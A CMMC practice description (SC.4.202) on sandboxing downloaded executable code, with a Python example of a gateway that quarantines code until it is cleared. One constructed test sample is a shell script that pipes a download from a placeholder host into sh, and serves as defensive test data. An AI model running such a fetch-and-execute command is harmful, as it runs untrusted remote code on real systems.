Requirement text: SC.4.202: Employ mechanisms to analyze executable code and scripts (e.g., sandbox)
traversing Internet network boundaries or other organizationally defined boundaries.
DISCUSSION FROM SOURCE: CMMC
Advanced malicious executable code has become much better at evading signature-based
detection and protection capabilities. Sandboxes and other advanced analytics add a further
layer of defense: they allow the code or script to execute in an isolated, controlled, and
instrumented environment, so that malicious activity is detected from the code's behavior
rather than from a previously known signature.
CMMC CLARIFICATION
The organization shall install systems that automatically analyze executable and mobile code
passing through the system boundary (e.g., code downloaded from the Internet or received by
another transmission method). This practice is not focused on email, which is covered in
practice SI.3.220. Any executable or mobile code identified as suspicious should be
quarantined and not allowed to pass through to the user until it is confirmed not to be
malware, or until it is confirmed to be required for a business purpose and released under a
recorded exception. Analysis that has not yet completed is not a confirmation: code still
awaiting a verdict stays in quarantine as well.
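The gateway-side logic this clarification describes, as an added Python illustration (not CMMC text and not any vendor's product): executable and mobile code is recognized by content rather than file name, submitted for analysis, and held in quarantine until the verdict is benign or a business-purpose exception is recorded. The sandbox here is a hypothetical stub (`SandboxStub`) that answers from a constructed hash-to-verdict table; `BoundaryGateway`, `classify`, and the sample files are assumptions made for the example, and a real deployment would submit each file to an appliance and poll for its result.

```python
"""Boundary analysis of downloaded executable and mobile code. Added
illustration for this practice, not CMMC text or any vendor's product. The
sandbox is a hypothetical stub answering from a constructed SHA-256 -> verdict
table; a real gateway would submit each file to an appliance and poll it."""
import hashlib
import io
import re
import zipfile
from enum import Enum
from typing import Dict, Optional

class Verdict(Enum):
    BENIGN = "benign"
    SUSPICIOUS = "suspicious"
    MALICIOUS = "malicious"
    PENDING = "pending"  # analysis not finished yet

SCRIPT_EXTENSIONS = {"js", "jse", "vbs", "vbe", "ps1", "bat", "cmd", "hta", "wsf", "sh"}

def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()

def classify(name: str, data: bytes) -> Optional[str]:
    """Code type if the bytes are executable/mobile code, else None. Content first;
    the extension is only a fallback for text scripts, which have no magic number."""
    if data[:2] == b"MZ":
        return "pe"  # a renamed .exe is still a PE
    if data[:2] == b"#!":
        return "script"
    if data[:5] == b"%PDF-":
        # A PDF is passive data unless it carries active content.
        if re.search(rb"/JavaScript|/JS\b|/Launch|/OpenAction", data):
            return "pdf-active"
        return None
    if data[:2] == b"PK":
        try:
            names = [n.lower() for n in zipfile.ZipFile(io.BytesIO(data)).namelist()]
        except zipfile.BadZipFile:
            return None
        # .docm/.xlsm and friends carry VBA in vbaProject.bin
        return "office-macro" if any(n.endswith("vbaproject.bin") for n in names) else None
    ext = name.lower().rsplit(".", 1)[-1] if "." in name else ""
    return "script" if ext in SCRIPT_EXTENSIONS else None

class SandboxStub:  # stand-in for the sandbox appliance (hypothetical)
    def __init__(self, known: Dict[str, Verdict]):
        self.known = known

    def submit(self, data: bytes) -> Verdict:
        return self.known.get(sha256_hex(data), Verdict.PENDING)

class BoundaryGateway:
    """Holds code in quarantine until the sandbox clears it or an exception is recorded."""
    def __init__(self, sandbox: SandboxStub):
        self.sandbox = sandbox
        self.quarantine: Dict[str, dict] = {}  # sha256 -> held-sample record

    def inspect(self, name: str, data: bytes) -> str:
        """Return "deliver", "hold" or "block" for one file crossing the boundary."""
        code_type = classify(name, data)
        if code_type is None:
            return "deliver"  # not code; outside this practice
        digest = sha256_hex(data)
        held = self.quarantine.get(digest)
        if held and held["released_by"]:
            return "deliver"  # documented business-purpose exception
        verdict = self.sandbox.submit(data)
        if verdict is Verdict.BENIGN:
            self.quarantine.pop(digest, None)
            return "deliver"
        # Suspicious, malicious and still-pending samples are all held: a slow sandbox must not become a pass-through.
        self.quarantine[digest] = {"name": name, "type": code_type, "verdict": verdict, "released_by": None}
        return "block" if verdict is Verdict.MALICIOUS else "hold"

    def release(self, digest: str, approver: str, ticket: str) -> bool:
        """Record a business-purpose exception; confirmed malware is never released."""
        held = self.quarantine.get(digest)
        if held is None or held["verdict"] is Verdict.MALICIOUS:
            return False
        held["released_by"] = f"{approver}:{ticket}"
        return True

# Constructed samples, not real malware: PE header, plain text, PDF whose
# OpenAction runs JavaScript, and a shell script.
PE_SAMPLE = b"MZ\x90\x00" + b"\x00" * 60
TEXT_SAMPLE = b"quarterly report\n"
PDF_ACTIVE = b"%PDF-1.4\n1 0 obj << /OpenAction << /S /JavaScript /JS (app.alert(1)) >> >>"
SCRIPT_SAMPLE = b"#!/bin/sh\ncurl http://example.invalid/x | sh\n"

def build_demo_gateway() -> BoundaryGateway:
    # Verdict table the stub answers from; the PDF is deliberately left pending.
    verdicts = {sha256_hex(PE_SAMPLE): Verdict.BENIGN, sha256_hex(SCRIPT_SAMPLE): Verdict.MALICIOUS}
    return BoundaryGateway(SandboxStub(verdicts))

if __name__ == "__main__":
    gw = build_demo_gateway()
    for fname, blob in [("setup.exe", PE_SAMPLE), ("notes.txt", TEXT_SAMPLE), ("form.pdf", PDF_ACTIVE), ("run.sh", SCRIPT_SAMPLE)]:
        print(fname, classify(fname, blob), gw.inspect(fname, blob))
```

Two design points matter for the practice. First, the decision to analyze rests on the bytes (PE header, shebang, active PDF content, VBA inside an Office zip), so renaming a binary to `.txt` does not bypass the control; the extension list only catches text scripts that have no magic number. Second, a pending verdict holds the file exactly like a suspicious one, and `release` refuses confirmed malware, so the only way a held sample reaches a user is a benign verdict or a recorded approver and ticket.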
Example
You are the data security manager for the organization. You have learned that staff routinely
browse the Internet and download PDF files and executables as part of their work
assignments. To ensure the downloaded files do not contain malware, you install a sandbox
appliance in the DMZ, inline in the download path, that checks all downloads for malicious
content and holds each file until the check has completed.
References
• CMMC
• NIST SP 800-53 Rev 4 SC-44